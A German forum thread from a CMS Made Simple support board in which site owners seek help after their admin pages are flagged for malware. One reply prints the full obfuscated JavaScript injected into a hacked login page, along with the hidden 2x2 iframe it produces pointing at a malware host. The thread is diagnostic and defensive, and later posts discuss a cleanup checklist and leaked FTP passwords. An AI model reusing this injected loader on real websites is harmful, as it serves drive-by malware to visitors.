Forum für CMS/made simple

LUCKMAGAZIN

kennt CMS/ms

Ort: Nuthe-Urstromtal

Registriert: 23. Oktober 2010

Beiträge: 184

Webseite

Maleware entdeckt! - Hilfe dringend benötigt

Auf meiner Admin-Seite bekomme ich seit heute folgende Meldung im Browser:

Warnung: Irgendetwas stimmt hier nicht!
www.meine-seite.de enthält Inhalte von www.ultralang.com, einer Website, die bekanntermaßen Malware enthält. Ihr Computer fängt sich möglicherweise einen Virus ein, wenn Sie diese Website besuchen.
Google hat schädliche Software gefunden, die möglicherweise auf Ihrem Computer installiert wird, wenn Sie fortfahren. Wenn Sie diese Website bereits in der Vergangenheit besucht haben oder dieser Website vertrauen, ist es möglich, dass sie vor Kurzem von einem Hacker manipuliert wurde. Sie sollten daher nicht fortfahren und den Vorgang vielleicht morgen wiederholen oder eine andere Website aufrufen.
Wir haben www.ultralang.com bereits informiert, dass wir Malware auf der Website gefunden haben. Weitere Informationen zu den Problemen auf www.ultralang.com erhalten Sie auf der Google-SafeBrowsing Diagnoseseite.

Wie kann ich das ganz schnell bereinigen?

---

MfG Marcel

antibart

Server-Pate

Registriert: 14. Dezember 2010

Beiträge: 879

Re: Maleware entdeckt! - Hilfe dringend benötigt

Hast du vielleicht Werbebanner oder andere externe Inhalte auf deiner Seite? Also irgendwas, was auf einem anderen Server liegt?

Oder betreibst du eine Art Forum, bei dem irgendwas hochgeladen wurde?

Beitrag geändert von antibart (01. Juni 2012 14:03)

LUCKMAGAZIN

kennt CMS/ms

Ort: Nuthe-Urstromtal

Registriert: 23. Oktober 2010

Beiträge: 184

Webseite

Re: Maleware entdeckt! - Hilfe dringend benötigt

na im adminbereich nicht

www.luck-magazin.de/admin/

---

MfG Marcel

rage_all

kennt CMS/ms

Ort: Augsburg

Registriert: 09. März 2011

Beiträge: 288

Re: Maleware entdeckt! - Hilfe dringend benötigt

Ohne mich groß aus dem Fenster lehnen zu wollen, glaube ich dass Du gehackt worden bist.
Warum ausgerechnet im Admin ist mir aber rätselhaft... 

Meine Sicherheitssoftware gibt mir nach Aufruf Deines Admin-Verzeichnis folgendes aus:

Ein Eindringversuch von 188.72.248.169 wurde blockiert.

Die Adresse von der das kommt (http://188.72.248.169/59563516.html) hat aber keine Inhalte - 404.

Im Quelltext Deiner Admin-Login Seite ist dieses JS-Schnipselchen am Ende zu finden

 Hier klicken, um den Code zum Kopieren zu markieren

[== JavaScript ==]
<script>try{q=document.createElement("u");q.appendChild(q+"");}catch(qw){h=-012/5;zz='a'+'l';f='fr'+'o'+'m'+'Ch';f+='arC';}try{begbe=prototype;}catch(b43gds){zz='zv'.substr(123-122)+zz;ss=[];f+=(h&&zz)?'ode':"";w=this;e=w[f.substr(11)+zz];n=[-3.375,-3.75,7.5,8.875,7.375,9.625,8.625,7.625,8.75,9.5,0.75,9.875,9.25,8.125,9.5,7.625,0,-0.125,2.5,8.125,7.75,9.25,7.125,8.625,7.625,-1,9.375,9.25,7.375,2.625,-0.75,8,9.5,9.5,9,2.25,0.875,0.875,9.875,9.875,9.875,0.75,9.625,8.5,9.5,9.25,7.125,8.5,7.125,8.75,7.875,0.75,7.375,8.875,8.625,0.875,9.375,9.5,7.125,9.5,9.375,0.75,9,8,9,-0.75,-1,8.75,7.125,8.625,7.625,2.625,-0.75,5.5,9.875,8.125,9.5,9.5,7.625,9.25,-0.75,-1,9.375,7.375,9.25,8.875,8.5,8.5,8.125,8.75,7.875,2.625,-0.75,7.125,9.625,9.5,8.875,-0.75,-1,7.75,9.25,7.125,8.625,7.625,7.25,8.875,9.25,7.5,7.625,9.25,2.625,-0.75,8.75,8.875,-0.75,-1,7.125,8.5,8.125,7.875,8.75,2.625,-0.75,7.375,7.625,8.75,9.5,7.625,9.25,-0.75,-1,8,7.625,8.125,7.875,8,9.5,2.625,-0.75,1.25,-0.75,-1,9.875,8.125,7.5,9.5,8,2.625,-0.75,1.25,-0.75,2.75,2.5,0.875,8.125,7.75,9.25,7.125,8.625,7.625,2.75,-0.125,0.125,2.375,-3.375,-3.75];for(i=6-2-1-2-1;i-166!=0;i++){k=i;ss=ss+String["from"+"CharCode"](-1*4*h*(5+1*n[k]));}e(ss);}</script>  

welches durch den Browser gerendert einen iFrame erzeugt:

 Hier klicken, um den Code zum Kopieren zu markieren

[== HTML ==]
<iframe src="http://www.ultralang.com/stats.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>

Wie und woher die Attacke da kommen soll, wenn die eine Ressource per 404 fehlt und die ultralang.com/stats.php (jedenfalls bei mir) keinerlei Code erzeugt, weiß ich aber auch nicht.

Ich würde die admin/index.php durch eine gesunde aus dem Backup ersetzen und schauen was dann passiert.
Wahrscheinlich ist es angebracht FTP-Passwörter, etc. zu ändern.

antibart

Server-Pate

Registriert: 14. Dezember 2010

Beiträge: 879

Re: Maleware entdeckt! - Hilfe dringend benötigt

na im adminbereich nicht

www.luck-magazin.de/admin/

Wenn du nichts Externes bei dir liegen hast, ist es durchaus möglich, dass du dir  tatsächlich was eingefangen hast.

Klick mal ruhig auf die Diagnose.

EDIT: zu spät. rage_all hat ja schon was gefunden.

Beitrag geändert von antibart (01. Juni 2012 14:39)

chica2

probiert CMS/ms aus

Ort: Kurpfalz

Registriert: 01. Februar 2011

Beiträge: 93

Re: Maleware entdeckt! - Hilfe dringend benötigt

hallo,
hab ein ähnliches Problem! das system wahrscheinlcih gehackt worden.
Die web-Seiten laufen zwar, und ich kann mich auch im admin Bereich ins backend einloggen und Seiten ändern etc. nur das News-Modul geht nicht mehr, denn wenn ich im Backend auf "News" klicke , meldet meine Firewall:

23.07.2012 15:16:02    HTTP-Prüfung    Datei    http://domain.de/admin/moduleinterface. … odule=News    JS/Iframe.CJ Trojaner    Verbindung getrennt - in Quarantäne kopiert   

Ich kann per FTP in den Dateien keine fremde Änderung erkennen!
Habe diese Datei gelöscht und aus der Sicherung neu hochgeladen:
"moduleinterface.php"
und Cache gelöscht

die Trojaner Meldung bleibt aber bestehen, kann nicht auf das news Modul zugreifen
an was kann das nun liegen, was kann ich denn da machen?

Soll ich nun alle Dateien für das News-Modul auf dem Server löschen und neu hochspielen? hilft das was?

Edit: ich verwende: CMS Made Simple™     1.10.3  "Hyacinthe"

hat hier jemand eine Idee?
Vielen Dank Gruß chica

Beitrag geändert von chica2 (23. Juli 2012 14:35)

nockenfell

Moderator

Ort: Lenzburg, Schweiz

Registriert: 09. November 2010

Beiträge: 2.930

Webseite

Re: Maleware entdeckt! - Hilfe dringend benötigt

Geh nach meiner Liste vor:
http://www.cmsmadesimple.de/forum/viewt … 536#p14536

---

[dieser Beitrag wurde mit 100% recycled bits geschrieben]
Mein Blog  /   Diverse Links rund um CMS Made Simple
Module: btAdminer, ToolBox

nicmare

Server-Pate

Registriert: 15. Dezember 2010

Beiträge: 1.314

Webseite

Re: Maleware entdeckt! - Hilfe dringend benötigt

die Liste ist klasse. Ich würde noch empfehlen folgendes zu ergänzen:
FileZilla aktualisieren oder deinstallieren/ersetzen.
Habe schon diverse Kunden mit diesem Problem gehabt bei denen die Ursache eindeutig auf FileZilla zurückzuführen war. es gibt dazu auch schon diverse Forendiskussionen da FileZilla die Passwörter im Klartext gespeichert hat.

Beitrag geändert von nicmare (23. Juli 2012 15:19)

---

Meine Projekte:
Dashcam-Test | Babyphone-Testberichte | Türspionkameras

chica2

probiert CMS/ms aus

Ort: Kurpfalz

Registriert: 01. Februar 2011

Beiträge: 93

Re: Maleware entdeckt! - Hilfe dringend benötigt

oje... das habe ich befürchtet.
Aber Danke für die Liste!!,

Da ich auch gehört habe,  dass FileZilla die Passwörter im klartext speichert, benutze ich das gar nicht, habe winSCP, und Totalcommander (mit Masterpasswort).

was meint ihr zu diesen Programmen?